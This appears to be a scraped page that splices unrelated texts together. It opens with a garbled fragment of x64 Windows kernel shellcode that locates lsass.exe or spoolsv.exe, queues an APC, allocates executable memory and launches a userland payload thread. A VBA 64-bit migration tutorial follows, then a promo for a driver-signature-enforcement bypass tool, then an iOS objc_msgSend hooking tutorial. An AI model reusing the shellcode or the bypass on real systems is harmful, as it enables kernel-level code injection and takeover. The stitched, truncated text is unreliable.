    add eax, 0x10
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead

    ; find offset of ETHREAD.ThreadListEntry
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)

    ; find offset of EPROCESS.ActiveProcessLinks
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
    ; check process name
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop

    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    ; iterate ThreadList until KeInsertQueueApc() success
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15

; Call function in specific module
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
    call get_proc_addr
    jmp rax

; Get function address in specific module
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx

; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
    push rdx
    xor eax, eax
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx

; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    mov rbp, [r8]       ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
    ; copy userland payload
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    ; find CreateThread address (in kernel32.dll)
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; first one always be executable, skip it
    lodsq               ; skip ntdll.dll
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop

    mov r15, [rax+0x20]
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp

    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30

How to convert Windows API declarations in VBA for 64-bit

Compile error message for legacy API declaration

Since Office 2010 all the Office applications including Microsoft Access and VBA are available as a 64-bit edition in addition to the classic 32-bit edition.

To clear up an occasional misconception. You do not need to install Office/Access as 64-bit application just because you got a 64-bit operating system. Windows x64 provides an excellent 32-bit subsystem that allows you to run any 32-bit application without drawbacks.

For now, 64-bit Office/Access still is rather the exception than the norm, but this is changing more and more.

Access — 32-bit vs. 64-bit

If you are just focusing on Microsoft Access there is actually no compelling reason to use the 64-bit edition instead of the 32-bit edition. Rather the opposite is true. There are several reasons not to use 64Bit Access.

  • Many ActiveX-Controls that are frequently used in Access development are still not available for 64-bit. Yes, this is still a problem in 2017, more than 10 years after the first 64Bit Windows operating system was released.
  • Drivers/Connectors for external systems like ODBC-Databases and special hardware might not be available. – Though this should rarely be an issue nowadays. Only if you need to connect to some old legacy systems this might still be a factor.
  • And finally, Access applications using the Windows API in their VBA code will require some migration work to function properly in an x64-environment.

There is only one benefit of 64-bit Access I’m aware of. When you open multiple forms at the same time that contain a large number of sub-forms, most likely on a tab control, you might run into out-of-memory-errors on 32-bit systems. The basic problem exists with 64-bit Access as well, but it takes much longer until you will see any memory related error.

Unfortunately (in this regard) Access is part of the Office Suite as is Microsoft Excel. For Excel, there actually are use cases for the 64-Bit edition. If you use Excel to calculate large data models, e.g. financial risk calculations, you will probably benefit from the additional memory available to a 64-bit application.

So, whether you as an Access developer like it or not, you might be confronted with the 64-bit edition of Microsoft Access because someone in your or your client’s organization decided they will install the whole Office Suite in 64-bit. – It is not possible to mix and match 32- and 64-bit applications from the Microsoft Office suite.

I can’t do anything about the availability of third-party-components, so in this article, I’m going to focus on the migration of Win-API calls in VBA to 64-bit compatibility.

Migrate Windows API-Calls in VBA to 64-bit

Fortunately, the Windows API was completely ported to 64-bit. You will not encounter any function, which was available on 32-bit but isn’t anymore on 64-bit. – At least I do not know of any.

However, I frequently encounter several common misconceptions about how to migrate your Windows API calls. I hope I will be able to debunk them with this text.

But first things first. The very first thing you will encounter when you try to compile an Access application with an API declaration that was written for 32-bit in VBA in 64-bit Access is an error message.

Compile error: The code in this project must be updated for use on 64-bit systems. Please review and update Declare statements and then mark them with the PtrSafe attribute.

This message is pretty clear about the problem, but you need further information to implement the solution.

With the introduction of Access 2010, Microsoft published an article on 32- and 64-Compatibility in Access. In my opinion, that article was comprehensive and pretty good, but many developers had the opinion it was insufficient.

Just recently there was a new, and in my opinion excellent, introduction to the 64-bit extensions in VBA7 published on MSDN. It actually contains all the information you need. Nevertheless, it makes sense to elaborate on how to apply it to your project.

The PtrSafe keyword

With VBA7 (Office 2010) the new PtrSafe keyword was added to the VBA language. This new keyword can (should) be used in DeclareStatements for calls to external DLL-Libraries, like the Windows API.

What does PtrSafe do? It actually does … nothing. Correct, it has no effect on how the code works at all.

The only purpose of the PtrSafe attribute is that you, as the developer, explicitly confirm to the VBA runtime environment that you checked your code to handle any pointers in the declared external function call correctly.

As the data type for pointers is different in a 64-bit environment (more on that in a moment) this actually makes sense. If you would just run your 32-bit API code in a 64-bit context, it would work; sometimes. Sometimes it would just not work. And sometimes it would overwrite and corrupt random areas of your computer’s memory and cause all sorts of random application instability and crashes. These effects would be very hard to track down to the incorrect API-Declarations.

For this understandable reason, the PtrSafe keyword is mandatory in 64-bit VBA for each external function declaration with the DeclareStatement. The PtrSafe keyword can be used in 32-bit VBA as well but is optional there for downward compatibility.

Public Declare PtrSafe Sub Sleep Lib «kernel32» (ByVal dwMilliseconds As Long)

The LongLong type

The data types Integer (16-bit Integer) and Long (32-bit Integer) are unchanged in 64-bit VBA. They are still 2 bytes and 4 bytes in size and their range of possible values is the same as it were before on 32-bit. This is not only true for VBA but for the whole Windows 64-bit platform. Generic data types retain their original size.

Now, if you want to use a true 64-bit Integer in VBA, you have to use the new LongLong data type. This data type is actually only available in 64-bit VBA, not in the 32-bit version. In context with the Windows API, you will actually use this data type only very, very rarely. There is a much better alternative.

The LongPtr data type

On 32-bit Windows, all pointers to memory addresses are 32-bit Integers. In VBA, we used to declare those pointer variables as Long. On 64-bit Windows, these pointers were changed to 64-bit Integers to address the larger memory space. So, obviously, we cannot use the unchanged Long data type anymore.

In theory, you could use the new LongLong type to declare integer pointer variables in 64-bit VBA code. In practice, you absolutely should not. There is a much better alternative.

Particularly for pointers, Microsoft introduced an all new and very clever data type. The LongPtr data type. The really clever thing about the LongPtr type is, it is a 32-bit Integer if the code runs in 32-bit VBA and it becomes a 64-bit Integer if the code runs in 64-bit VBA.

LongPtr is the perfect type for any pointer or handle in your Declare Statement. You can use this data type in both environments and it will always be appropriately sized to handle the pointer size of your environment.

Misconception: “You should change all Long variables in your Declare Statements and Type declarations to be LongPtr variables when adapting your code for 64-bit.”


As mentioned above, the size of the existing, generic 32-bit data types has not changed. If an API-Function expected a Long Integer on 32-bit it will still expect a Long Integer on 64-bit.

Only if a function parameter or return value is representing a pointer to a memory location or a handle (e.g. Window Handle (HWND) or Picture Handle), it will be a 64-bit Integer. Only these types of function parameters should be declared as LongPtr.

If you use LongPtr incorrectly for parameters that should be plain Long Integer your API calls may not work or may have unexpected side effects. Particularly if you use LongPtr incorrectly in Type declarations. This will disrupt the sequential structure of the type and the API call will raise a type mismatch exception.

Public Declare PtrSafe Function ShowWindow Lib «user32» (ByVal hWnd As LongPtr, ByVal nCmdShow As Long) As Boolean

The hWnd argument is a handle of a window, so it needs to be a LongPtr. nCmdShow is an int32, it should be declared as Long in 32-bit and in 64-bit as well.

Do not forget a very important detail. Not only your Declare Statement should be written with the LongPtr data type, your procedures calling the external API function must, in fact, use the LongPtr type as well for all variables, which are passed to such a function argument.

VBA7 vs WIN64 compiler constants

Also new with VBA7 are the two new compiler constants Win64 and VBA7VBA7 is true if your code runs in the VBA7-Environment (Access/Office 2010 and above). Win64 is true if your code actually runs in the 64-bit VBA environment. Win64 is not true if you run a 32-Bit VBA Application on a 64-bit system.

Misconception: “You should use the WIN64 compiler constants to provide two versions of your code if you want to maintain compatibility with 32-bit VBA/Access.”


For 99% of all API declarations, it is completely irrelevant if your code runs in 32-bit VBA or in 64-bit VBA.

As explained above, the PtrSafe Keyword is available in 32-bit VBA as well. And, more importantly, the LongPtr data type is too. So, you can and should write API code that runs in both environments. If you do so, you’ll probably never need to use conditional compilation to support both platforms with your code.

However, there might be another problem. If you only target Access (Office) 2010 and newer, my above statement is unconditionally correct. But if your code should run with older version of Access as well, you need to use conditional compilation indeed. But you still do not need to care about 32/64-Bit. You need to care about the Access/VBA-Version you code is running in.

You can use the VBA7 compiler constant to write code for different versions of VBA. Here is an example for that.

Private Const SW_MAXIMIZE As Long = 3 #If VBA7 Then Private Declare PtrSafe Function ShowWindow Lib «USER32» _ (ByVal hwnd As LongPtr, ByVal nCmdShow As Long) As Boolean Private Declare PtrSafe Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr #Else Private Declare Function ShowWindow Lib «USER32» _ (ByVal hwnd As Long, ByVal nCmdShow As Long) As Boolean Private Declare Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As Long #End If Public Sub MaximizeWindow(ByVal WindowTitle As String) #If VBA7 Then Dim hwnd As LongPtr #Else Dim hwnd As Long #End If hwnd = FindWindow(vbNullString, WindowTitle) If hwnd <> 0 Then Call ShowWindow(hwnd, SW_MAXIMIZE) End If End Sub

Now, here is a screenshot of that code in the 64-bit VBA-Editor. Notice the red highlighting of the legacy declaration. This code section is marked, but it does not produce any actual error. Due to the conditional compilation, it will never be compiled in this environment.

Syntax error higlighting in x64

When to use the WIN64 compiler constant?

There are situations where you still want to check for Win64. There are some new API functions available on the x64 platform that simply do not exist on the 32-bit platform. So, you might want to use a new API function on x64 and a different implementation on x86 (32-bit).

A good example for this is the GetTickCount function. This function returns the number of milliseconds since the system was started. Its return value is a Long. The function can only return the tick count for 49.7 days before the maximum value of Long is reached. To improve this, there is a newer GetTickCount64 function. This function returns an ULongLong, a 64-bit unsigned integer. The function is available on 32-bit Windows as well, but we cannot use it there because we have no suitable data type in VBA to handle its return value.

If you want to use this the 64bit version of the function when your code is running in a 64-bit environment, you need to use the Win64constant.

#If Win64 Then Public Declare PtrSafe Function GetTickCount Lib «Kernel32» Alias «GetTickCount64» () As LongPtr #Else Public Declare PtrSafe Function GetTickCount Lib «Kernel32» () As LongPtr #End If

In this sample, I reduced the platform dependent code to a minimum by declaring both versions of the function as GetTickCount. Only on 64-bit, I use the alias GetTickCount64 to map this to the new version of this function. The “correct” return value declaration would have been LongLong for the 64-bit version and just Long for the 32-bit version. I use LongPtr as return value type for both declarations to avoid platform dependencies in the calling code.

A common pitfall — The size of user-defined types

There is a common pitfall that, to my surprise, is hardly ever mentioned.

Many API-Functions that need a user-defined type passed as one of their arguments expect to be informed about the size of that type. This usually happens either by the size being stored in a member inside the structure or passed as a separate argument to the function.

Frequently developers use the Len-Function to determine the size of the type. That is incorrect, but it works on the 32-bit platform — by pure chance. Unfortunately, it frequently fails on the 64-bit platform.

To understand the issue, you need to know two things about Window’s inner workings.

  1. The members of user-defined types are aligned sequentially in memory. One member after the other.
  2. Windows manages its memory in small chunks. On a 32-bit system, these chunks are always 4 bytes big. On a 64-bit system, these chunks have a size of 8 bytes.

If several members of a user-defined type fit into such a chunk completely, they will be stored in just one of those. If a part of such a chunk is already filled and the next member in the structure will not fit in the remaining space, it will be put in the next chunk and the remaining space in the previous chunk will stay unused. This process is called padding.

Regarding the size of user-defined types, the Windows API expects to be told the complete size the type occupies in memory. Including those padded areas that are empty but need to be considered to manage the total memory area and to determine the exact positions of each of the members of the type.

The Len-Function adds up the size of all the members in a type, but it does not count the empty memory areas, which might have been created by the padding. So, the size computed by the Len-Function is not correct! — You need to use the LenB-Function to determine the total size of the type in memory.

Here is a small sample to illustrate the issue:

Public Type smallType a As Integer b As Long x As LongPtr End Type Public Sub testTypeSize() Dim s As smallType Debug.Print «Len: « & Len(s) Debug.Print «LenB: « & LenB(s) End Sub

On 32-bit the Integer is two bytes in size but it will occupy 4 bytes in memory because the Long is put in the next chunk of memory. The remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 10 bytes, but the whole type is 12 bytes in memory.

On 64-bit the Integer and the Long are 6 bytes total and will fit into the first chunk together. The LongPtr (now 8 bytes in size) will be put into the net chunk of memory and once again the remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 14 bytes, but the whole type is 16 bytes in memory.

So, if the underlying mechanism exists on both platforms, why is this not a problem with API calls on 32-bit? — Simply by pure chance. To my knowledge, there is no Windows API function that explicitly uses a datatype smaller than a DWORD (Long) as a member in any of its UDT arguments.

Wrap up

With the content covered in this article, you should be able to adapt most of your API-Declarations to 64-bit.

Many samples and articles on this topic available on the net today are lacking sufficient explanation to highlight the really important issues. I hope I was able to show the key facts for a successful migration.

Always keep in mind, it is actually not that difficult to write API code that is ready for 64-bit. — Good luck!

A Tool To Bypass Windows x64 Driver Signature Enforcement

TDL (Turla Driver Loader) For Bypassing Windows x64 Signature Enforcement

Definition: TDL Driver loader allows bypassing Windows x64 Driver Signature Enforcement.

What are the system requirements and limitations?

It can run on OS x64 Windows 7/8/8.1/10.
As Vista is obsolete so, TDL doesn’t support Vista it only designed for x64 Windows.
Privilege of administrator is required.
Loaded drivers MUST BE specially designed to run as «driverless».
There is No SEH support.
There is also No driver unloading.
Automatically Only ntoskrnl import resolved, else everything is up to you.
It also provides Dummy driver examples.

Differentiate DSEFix and TDL:

As both DSEFix and TDL uses advantages of driver exploit but they have entirely different way of using it.

Benefits of DSEFix: 

It manipulates kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL).
DSEFix is simple- you need only to turn DSE it off — load your driver nothing else required.
DSEFix is a potential BSOD-generator as it id subject to PatchGuard (KPP) protection.

Advantages of TDL:

It is friendly to PatchGuard as it doesn’t patch any kernel variables.
Shellcode which TDL used can be able to map driver to kernel mode without windows loader.
Non-invasive bypass od DSE is the main advantage of TDL.

There are some disadvantages too:

To run as «driverless» Your driver must be specially created.
Driver should exist in kernel mode as executable code buffer
You can load multiple drivers, if they are not conflicting each other.


TDL contains full source code. You need Microsoft Visual Studio 2015 U1 and later versions if you want to build it. And same as for driver builds there should be Microsoft Windows Driver Kit 8.1.

Download Link: Click Here

Tracing Objective-C method calls

Linux has this great tool called strace, on OSX there’s a tool called dtruss — based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one — albeit a simpler version for now. I called it objc_trace.

Objc_trace’s functionality is quite limited at the moment. It will print out the name of the method, the class and a list of parameters to the method. In the future it will be expanded to do more things, however just knowing which method was called is enough for many debugging purposes.

Something about the language

Without going into too much detail let’s look into the relevant parts of the Objective-Cruntime. This subject has been covered pretty well by the hacker community. In Phrack there is a great article covering various internals of the language. However, I will scratch the surface to review some aspects that are useful for this context.

The language is incredibly dynamic. While still backwards compatible to C (or C++), most of the code is written using classes and methods a.k.a. structures and function pointers. A class is exactly what you’re thinking of. It can have static or instance methods or fields. For example, you might have a class Book with a method Pages that returns the contents. You might call it this way:

	Book* book = [[Book alloc] init];
	Page* pages = [book Pages];

The alloc function is a static method while the others (init and Pages) are dynamic. What actually happens is that the system sends messages to the object or the static class. The message contains the class name, the instance, the method name and any parameters. The runtime will resolve which compiled function actually implements this method and call that.

If anything above doesn’t make sense you might want to read the referenced Phrack article for more details.

Message passing is great, though there are all kinds of efficiency considerations in play. For example, methods that you call will eventually get cached so that the resolution process occurs much faster. What’s important to note is that there is some smoke and mirrors going on.

The system is actually not sending messages under the hood. What it is doing is routing the execution using a single library call: objc_msgSend [1]. This is due to how the concept of a message is implemented under the hood.

	id objc_msgSend(id self, SEL op, ...)

Let’s take ourselves out of the Objective-C abstractions for a while and think about how things are implemented in C. When a method is called the stack and the registers are configured for the objc_msgSend call. id type is kind of like a void * but restricted to Objective-C class instances. SEL type is actually char* type and refers to selectors, more specifically the methods names (which include parameters). For example, a method that takes two parameters will have a selector that might look something like this: createGroup:withCapacity:. Colons signal that there should be a parameter there. Really quite confusing but we won’t dwell on that.

The useful part is that a selector is a C-String that contains the method name and its named parameters. A non-obfuscating compiler does not remove them because the names are needed to resolve the implementing function.

Shockingly, the function that implements the method takes in two extra parameters ahead of the user defined parameters. Those are the self and the op. If you look at the disassembly, it looks something like this (taken from Damn Vulnerable iOS App):

__text:100005144 ; YapDatabaseViewState - (id)createGroup:(id) withCapacity:(uint64_t)
__text:100005144 ; Attributes: bp-based frame
__text:100005144 ; id __cdecl -[YapDatabaseViewState createGroup:withCapacity:]
                        ;         (struct YapDatabaseViewState *self, SEL, id, uint64_t)
__text:100005144 __YapDatabaseViewState_createGroup_withCapacity__

Notice that the C function is called __YapDatabaseViewState_createGroup_withCapacity__, the method is called createGroup and the class is YapDatabaseViewState. It takes two parameters: an idand a uint64_t. However, it also takes a struct YapDatabaseViewState *self and a SEL. This signature essentially matches the signature of objc_msgSend, except that the latter has variadic parameters.

The existence and the location of the extra parameters is not accidental. The reason for this is that objc_msgSend will actually redirect execution to the implementing function by looking up the selector to function mapping within the class object. Once it finds the target it simply jumps there without having to readjust the parameter registers. This is why I referred to this as a routing mechanism, rather than message passing. Of course, I say that due to the implementation details, rather than the conceptual basis for what is happening here.

Quite smart actually, because this allows the language to be very dynamic in nature i.e. I can remap SEL to Function mapping and change the implementation of any particular method. This is also great for reverse engineering because this system retains a lot of the labeling information that the developer puts into the source code. I quite like that.

The plan

Now that we’ve seen how Objective-C makes method calls, we notice that objc_msgSend becomes a choke point for all method calls. It is like a hub in a poorly setup network with many many users. So, in order to get a list of every method called all we have to do is watch this function. One way to do this is via a debugger such as LLDB or GDB. However, the trouble is that a debugger is fairly heavy and mostly interactive. It’s not really good when you want to capture a run or watch the process to pin point a bug. Also, the performance hit might be too much. For more offensive work, you can’t embed one of those debuggers into a lite weight implant.

So, what we are going to do is hook the objc_msgSend function on an ARM64 iOS Objective-C program. This will allow us to specify a function to get called before objc_msgSend is actually executed. We will do this on a Jailbroken iPhone — so no security mechanism bypasses here, the Jailbreak takes care of all of that.

Figure 1: Patching at high level

On the high level the hooking works something like this. objc_msgSend instructions are modified in the preamble to jump to another function. This other function will perform our custom tracing features, restore the CPU state and return to a jump table. The jump table is a dynamically generated piece of code that will execute the preamble instructions that we’ve overwritten and jump back to objc_msgSend to continue with normal execution.


The implementation of the technique presented can be found in the objc_tracerepository.

The first thing we are going to do is allocate what I call a jump page. It is called so because this memory will be a page of code that jumps back to continue executing the original function.

s_jump_page* t_func = 
   (s_jump_page*)mmap(NULL, 4096, 
    		MAP_ANON  | MAP_PRIVATE, -1, 0);

Notice that the type of the jump page is s_jump_page which is a structure that will represent our soon to be generated code.

typedef struct {
    instruction_t     inst[4];    
    s_jump_patch jump_patch[5];
    instruction_t     backup[4];    
} s_jump_page;

The s_jump_page structure contains four instructions that we overwrite (think back to the diagram at step 2). We also keep a backup of these instruction at the end of the structure — not strictly necessary but it makes for easier unhooking. Then there are five structures called jump patches. These are special sets of instructions that will redirect the CPU to an arbitrary location in memory. Jump patches are also represented by a structure.

typedef struct {
    instruction_t i1_ldr;
    instruction_t i2_br;
    address_t jmp_addr;
} s_jump_patch;

Using these structures we can build a very elegant and transparent mechanism for building dynamic code. All we have to do is create an inline assembly function in C and cast it to the structure.

void d_jump_patch() {
    __asm__ __volatile__(
        // trampoline to somewhere else.
        "ldr x16, #8;\n"
        "br x16;\n"
        ".long 0;\n" // place for jump address
        ".long 0;\n"

This is ARM64 Assembly to load a 64-bit value from address PC+8 then jump to it. The .long placeholders are places for the target address.

s_jump_patch* jump_patch(){
    return (s_jump_patch*)d_jump_patch;

In order to use this we simply cast the code i.e. the d_jump_patch function pointer to the structure and set the value of the jmp_addr field. This is how we implement the function that generates the custom trampoline.

void write_jmp_patch(void* buffer, void* dst) {
    // returns the pointer to d_jump_patch.
    s_jump_patch patch = *(jump_patch());

    patch.jmp_addr = (address_t)dst;

    *(s_jump_patch*)buffer = patch;

We take advantage of the C compiler automatically copying the entire size of the structure instead of using memcpy. In order to patch the original objc_msgSend function we use write_jmp_patch function and point it to the hook function. Of course, before we can do that we copy the original instructions to the jump page for later execution and back up.

    //   Building the Trampoline
    *t_func = *(jump_page());
    // save first 4 32bit instructions
    //   original -> trampoline
    instruction_t* orig_preamble = (instruction_t*)o_func;
    for(int i = 0; i < 4; i++) {
        t_func->inst  [i] = orig_preamble[i];
        t_func->backup[i] = orig_preamble[i];

Now that we have saved the original instructions from objc_msgSend we have to be aware that we’ve copied four instructions. A lot can happen in four instructions, all sorts of decisions and branches. In particular I’m worried about branches because they can be relative. So, what we need to do is validate that t_func->inst doesn’t have any branches. If it does, they will need to modified to preserve functionality.

This is why s_jump_page has five jump patches:

  1. All four instructions are non branches, so the first jump patch will automatically redirect execution to objc_msgSend+16 (skipping the patch).
  2. There are up to four branch instructions, so each of the jump patches will be used to redirect to the appropriate offset into objc_msgSend.

Checking for branch instructions is a bit tricky. ARM64 is a RISC architecture and does not present the same variety of instructions as, say, x86-64. But, there are still quite a few [2].

  1. Conditional Branches:
    • B.cond label jumps to PC relative offset.
    • CBNZ Wn|Xn, label jumps to PC relative offset if Wn is not equal to zero.
